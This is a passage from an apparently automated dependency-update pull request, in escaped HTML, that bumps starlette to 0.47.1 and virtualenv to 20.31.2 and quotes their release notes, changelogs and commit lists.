view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `starlette` from 0.40.0 to 0.47.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/starlette/releases\"\u003estarlette's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.47.1\u003c/h2\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003eSelf\u003c/code\u003e in \u003ccode\u003eTestClient.__enter__\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2951\"\u003e#2951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow async exception handlers to type-check \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2949\"\u003e#2949\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/starlette/compare/0.47.0...0.47.1\"\u003ehttps://github.com/encode/starlette/compare/0.47.0...0.47.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eAdded\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for ASGI \u003ccode\u003epathsend\u003c/code\u003e extension \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2671\"\u003e#2671\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003epartitioned\u003c/code\u003e attribute to \u003ccode\u003eResponse.set_cookie\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2501\"\u003e#2501\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChange \u003ccode\u003emethods\u003c/code\u003e parameter type from \u003ccode\u003elist[str]\u003c/code\u003e to \u003ccode\u003eCollection[str]\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2903\"\u003e#2903\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003eimport typing\u003c/code\u003e by \u003ccode\u003efrom typing import ...\u003c/code\u003e in the whole codebase \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2867\"\u003e#2867\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMark \u003ccode\u003eExceptionMiddleware.http_exception\u003c/code\u003e as async to prevent thread creation \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2922\"\u003e#2922\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/danlapid\"\u003e\u003ccode\u003e@​danlapid\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2922\"\u003eencode/starlette#2922\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Flecart\"\u003e\u003ccode\u003e@​Flecart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2501\"\u003eencode/starlette#2501\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/AllenSH12\"\u003e\u003ccode\u003e@​AllenSH12\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2936\"\u003eencode/starlette#2936\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/waketzheng\"\u003e\u003ccode\u003e@​waketzheng\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2867\"\u003eencode/starlette#2867\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jonathanberthias\"\u003e\u003ccode\u003e@​jonathanberthias\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2903\"\u003eencode/starlette#2903\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/starlette/compare/0.46.2...0.47.0\"\u003ehttps://github.com/encode/starlette/compare/0.46.2...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse correct index on backwards compatible logic in \u003ccode\u003eTemplateResponse\u003c/code\u003e by \u003ca href=\"https://github.com/alex-oleshkevich\"\u003e\u003ccode\u003e@​alex-oleshkevich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2909\"\u003eencode/starlette#2909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevents reraising of exception from \u003ccode\u003eBaseHTTPMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/ramannanda9\"\u003e\u003ccode\u003e@​ramannanda9\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2911\"\u003eencode/starlette#2911\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ahryniv\"\u003e\u003ccode\u003e@​ahryniv\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2913\"\u003eencode/starlette#2913\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ramannanda9\"\u003e\u003ccode\u003e@​ramannanda9\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2911\"\u003eencode/starlette#2911\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/starlette/compare/0.46.1...0.46.2\"\u003ehttps://github.com/encode/starlette/compare/0.46.1...0.46.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/starlette/blob/master/docs/release-notes.md\"\u003estarlette's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.47.1 (June 21, 2025)\u003c/h2\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003eSelf\u003c/code\u003e in \u003ccode\u003eTestClient.__enter__\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2951\"\u003e#2951\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAllow async exception handlers to type-check \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2949\"\u003e#2949\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 29, 2025)\u003c/h2\u003e\n\u003ch4\u003eAdded\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for ASGI \u003ccode\u003epathsend\u003c/code\u003e extension \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2671\"\u003e#2671\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003epartitioned\u003c/code\u003e attribute to \u003ccode\u003eResponse.set_cookie\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2501\"\u003e#2501\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eChanged\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eChange \u003ccode\u003emethods\u003c/code\u003e parameter type from \u003ccode\u003elist[str]\u003c/code\u003e to \u003ccode\u003eCollection[str]\u003c/code\u003e\n\u003ca href=\"https://redirect.github.com/encode/starlette/pull/2903\"\u003e#2903\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003eimport typing\u003c/code\u003e by \u003ccode\u003efrom typing import ...\u003c/code\u003e in the whole codebase\n\u003ca href=\"https://redirect.github.com/encode/starlette/pull/2867\"\u003e#2867\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eMark \u003ccode\u003eExceptionMiddleware.http_exception\u003c/code\u003e as async to prevent thread creation\n\u003ca href=\"https://redirect.github.com/encode/starlette/pull/2922\"\u003e#2922\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.2 (April 13, 2025)\u003c/h2\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003ePrevents reraising of exception from BaseHttpMiddleware \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2911\"\u003e#2911\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eUse correct index on backwards compatible logic in \u003ccode\u003eTemplateResponse\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2909\"\u003e#2909\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.1 (March 8, 2025)\u003c/h2\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAllow relative directory path when \u003ccode\u003efollow_symlinks=True\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2896\"\u003e#2896\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (February 22, 2025)\u003c/h2\u003e\n\u003ch4\u003eAdded\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eGZipMiddleware\u003c/code\u003e: Make sure \u003ccode\u003eVary\u003c/code\u003e header is always added if a response can be compressed \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2865\"\u003e#2865\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRaise exception from background task on BaseHTTPMiddleware \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2812\"\u003e#2812\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eGZipMiddleware\u003c/code\u003e: Don't compress on server sent events \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2871\"\u003e#2871\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/fa5355442753f794965ae1af0f87f9fec1b9a3de\"\u003e\u003ccode\u003efa53554\u003c/code\u003e\u003c/a\u003e Version 0.47.1 (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2952\"\u003e#2952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/e741635e5452ba8013d926bddf2be3a292910dca\"\u003e\u003ccode\u003ee741635\u003c/code\u003e\u003c/a\u003e Use \u003ccode\u003eSelf\u003c/code\u003e in \u003ccode\u003eTestClient.__enter__\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2951\"\u003e#2951\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/739ea4928b11d4b4cb2b366ccad11405ef3034c4\"\u003e\u003ccode\u003e739ea49\u003c/code\u003e\u003c/a\u003e Allow async exception handlers to type-check (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2949\"\u003e#2949\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/78da9b9e218ab289117df7d62aee200ed4c59617\"\u003e\u003ccode\u003e78da9b9\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 6 updates (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2948\"\u003e#2948\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/739321d719db5b6e3fff9ccca9a2ccc7c2e07f18\"\u003e\u003ccode\u003e739321d\u003c/code\u003e\u003c/a\u003e Version 0.47.0 (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2947\"\u003e#2947\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/af1c709a7d1b92dee2921cceef7ef8d1df65ad25\"\u003e\u003ccode\u003eaf1c709\u003c/code\u003e\u003c/a\u003e Add support for ASGI \u003ccode\u003epathsend\u003c/code\u003e extension (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2671\"\u003e#2671\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/f0997431a51116e43d5f5b6538e3ecf4e8fea704\"\u003e\u003ccode\u003ef099743\u003c/code\u003e\u003c/a\u003e Make annotation for \u003ccode\u003emethods\u003c/code\u003e more permissive (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2903\"\u003e#2903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/2ff76532710cdc49d6f9b3e5067533aa481cecd0\"\u003e\u003ccode\u003e2ff7653\u003c/code\u003e\u003c/a\u003e chore: improve type hints (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2867\"\u003e#2867\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/bc4b9379c363a4c136cc0f8f29bb89ec7d641d3e\"\u003e\u003ccode\u003ebc4b937\u003c/code\u003e\u003c/a\u003e CI: skips type check until mypy ready for 3.14 (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2936\"\u003e#2936\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/4acf1d1ca3e8aa767567cb4e6e12f093f066553b\"\u003e\u003ccode\u003e4acf1d1\u003c/code\u003e\u003c/a\u003e feat: add partitioned attribute to cookie (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2501\"\u003e#2501\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/encode/starlette/compare/0.40.0...0.47.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 20.26.6 to 20.31.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.31.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.31.1 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2882\"\u003epypa/virtualenv#2882\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReintroduce the --wheel CLI option, even though it has no effect on Python \u0026gt; 3.8 by \u003ca href=\"https://github.com/hroncok\"\u003e\u003ccode\u003e@​hroncok\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2884\"\u003epypa/virtualenv#2884\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.31.1...20.31.2\"\u003ehttps://github.com/pypa/virtualenv/compare/20.31.1...20.31.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.31.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.31.0 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2879\"\u003epypa/virtualenv#2879\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump setuptools and pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2880\"\u003epypa/virtualenv#2880\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.31.0...20.31.1\"\u003ehttps://github.com/pypa/virtualenv/compare/20.31.0...20.31.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.31.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.30.0 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2864\"\u003epypa/virtualenv#2864\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStop including 'wheel', setuptools 70.1 has native bdist_wheel support by \u003ca href=\"https://github.com/stefanor\"\u003e\u003ccode\u003e@​stefanor\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2868\"\u003epypa/virtualenv#2868\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert a large part of the wheel removal, to support Python 3.8 by \u003ca href=\"https://github.com/stefanor\"\u003e\u003ccode\u003e@​stefanor\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2876\"\u003epypa/virtualenv#2876\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix HelpFormatter for Python 3.14 by \u003ca href=\"https://github.com/cdce8p\"\u003e\u003ccode\u003e@​cdce8p\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2878\"\u003epypa/virtualenv#2878\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix get_embed_wheel for unknown wheels by \u003ca href=\"https://github.com/tiran\"\u003e\u003ccode\u003e@​tiran\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2877\"\u003epypa/virtualenv#2877\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cdce8p\"\u003e\u003ccode\u003e@​cdce8p\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2878\"\u003epypa/virtualenv#2878\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tiran\"\u003e\u003ccode\u003e@​tiran\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2877\"\u003epypa/virtualenv#2877\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.30.0...20.31.0\"\u003ehttps://github.com/pypa/virtualenv/compare/20.30.0...20.31.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.30.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.29.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2855\"\u003epypa/virtualenv#2855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd GraalPy support by \u003ca href=\"https://github.com/timfel\"\u003e\u003ccode\u003e@​timfel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2859\"\u003epypa/virtualenv#2859\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade setuptools by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2863\"\u003epypa/virtualenv#2863\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/timfel\"\u003e\u003ccode\u003e@​timfel\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2859\"\u003epypa/virtualenv#2859\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.29.3...20.30.0\"\u003ehttps://github.com/pypa/virtualenv/compare/20.29.3...20.30.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.29.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.31.2 (2025-05-08)\u003c/h2\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch2\u003ev20.31.1 (2025-05-05)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.31.1\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003epip to \u003ccode\u003e25.1.1\u003c/code\u003e from \u003ccode\u003e25.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e80.3.1\u003c/code\u003e from \u003ccode\u003e78.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2880\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.31.0 (2025-05-05)\u003c/h2\u003e\n\u003cp\u003eFeatures - 20.31.0\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNo longer bundle \u003ccode\u003ewheel\u003c/code\u003e wheels (except on Python 3.8), \u003ccode\u003esetuptools\u003c/code\u003e includes native \u003ccode\u003ebdist_wheel\u003c/code\u003e support.  Update \u003ccode\u003epip\u003c/code\u003e to \u003ccode\u003e25.1\u003c/code\u003e. (:issue:\u003ccode\u003e2868\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBugfixes - 20.31.0\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``get_embed_wheel()`` no longer fails with a :exc:`TypeError` when it is\n  called with an unknown *distribution*. (:issue:`2877`)\n- Fix ``HelpFormatter`` error with Python 3.14.0b1. (:issue:`2878`)\n\u003ch2\u003ev20.30.0 (2025-03-31)\u003c/h2\u003e\n\u003cp\u003eFeatures - 20.30.0\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eGraalPy \u0026lt;https://github.com/oracle/graalpython\u0026gt;\u003c/code\u003e_. (:issue:\u003ccode\u003e2832\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBugfixes - 20.30.0\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e78.1.0\u003c/code\u003e from \u003ccode\u003e75.3.2\u003c/code\u003e (:issue:\u003ccode\u003e2863\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.29.3 (2025-03-06)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.29.3\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore unreadable directories in \u003ccode\u003ePATH\u003c/code\u003e. (:issue:\u003ccode\u003e2794\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ev20.29.2 (2025-02-10)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/91cf77181ce159d8de6250224781f7103e6d6661\"\u003e\u003ccode\u003e91cf771\u003c/code\u003e\u003c/a\u003e release 20.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/9c4cd8e1a4744e4dc630b2ee35a506ad91ac4137\"\u003e\u003ccode\u003e9c4cd8e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2884\"\u003e#2884\u003c/a\u003e from hroncok/wheel-option-back\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/e9b6ba728f44ffb84ca44a40b58508c3dd5f7b29\"\u003e\u003ccode\u003ee9b6ba7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2882\"\u003e#2882\u003c/a\u003e from pypa/release-20.31.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/71d6f0a03c36619ca6bc4f37711f8fb8b2894758\"\u003e\u003ccode\u003e71d6f0a\u003c/code\u003e\u003c/a\u003e Update changelog.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/572aa2319783c58d2729dd94a0e3fb5435d62ff3\"\u003e\u003ccode\u003e572aa23\u003c/code\u003e\u003c/a\u003e release 20.31.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/715268e5fb0a323690b722efcd2e2cf5a14cd5ba\"\u003e\u003ccode\u003e715268e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2880\"\u003e#2880\u003c/a\u003e from gaborbernat/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/472157d7ad566dc999948f7d87d9ec5dc6508806\"\u003e\u003ccode\u003e472157d\u003c/code\u003e\u003c/a\u003e Bump setuptools and pip\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f7d440dc29c0a6c6d29c1fdd4ddf65b7b10daa0b\"\u003e\u003ccode\u003ef7d440d\u003c/code\u003e\u003c/a\u003e release 20.31.0 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2879\"\u003e#2879\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/2b7ea303bcd64959f88f2617ebba74a6e2ecb646\"\u003e\u003ccode\u003e2b7ea30\u003c/code\u003e\u003c/a\u003e release 20.31.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/a2e76cb116adfc20d05623b4fa075e4ca222cf6e\"\u003e\u003ccode\u003ea2e76cb\u003c/code\u003e\u003c/a\u003e Fix get_embed_wheel for unknown wheels (\u003ca 